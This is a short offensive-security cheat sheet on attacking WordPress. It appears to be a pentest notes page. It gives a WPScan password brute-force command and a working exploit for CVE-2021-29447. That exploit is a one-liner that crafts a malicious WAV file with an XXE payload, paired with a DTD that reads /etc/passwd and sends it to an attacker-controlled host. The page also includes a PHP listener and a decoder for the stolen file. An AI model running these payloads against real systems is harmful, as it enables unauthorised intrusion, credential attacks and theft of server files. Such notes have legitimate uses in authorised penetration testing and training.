Wordpress

Generic methodologies and some CVEs

Enumeration

WPScan is the go-to tool for scanning a Wordpress application. It is also relatively important to grab an API key for it also and configure your wpscan installation to use it.

Wp-Login Brute Force

wpscan --url victim.ip -U admin --passwords passlist

CVE-2021-29447 / Authenticated XXE & SSRF

If you have media upload rights and if your Wpscan return this vulnerability. You are in for a treat. It is possible to upload a malicious WAV

WPScan snippet of scan

Using echo and its parameters to escape backslashes and no trail lines, use this one liner to create a malicious WAV file.

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:YOUR_PORT/malicious.dtd'"'"'>%remote;%init;%trick;]>\x00' > malicious.wav

On your box, create the malicious.dtd file and prepare yourself to upload this file to the server. The content of the malicious file should be like this: replace 

<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd"> 
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOUR_IP:YOUR_PORT/malicious.dtd?p=%file;'>" >

  1. Use PHP to host malicious.dtd

  2. Upload malicious.wav

php -S YOUR_IP:YOUR_PORT

As soon as you upload the malicious.wav, your php web server should request a GET request with p as the parameter. Said parameter should hold the requested server file, encoded as zlib(base64).

Base64 dump of the /etc/passwd on Wordpress server

And then you can use php to decode it.

<?php echo zlib_decode(base64_decode('b64-to-decode')); ?>

PreviousCMSNextPath traversal & LFI/RFI

Last updated

Was this helpful?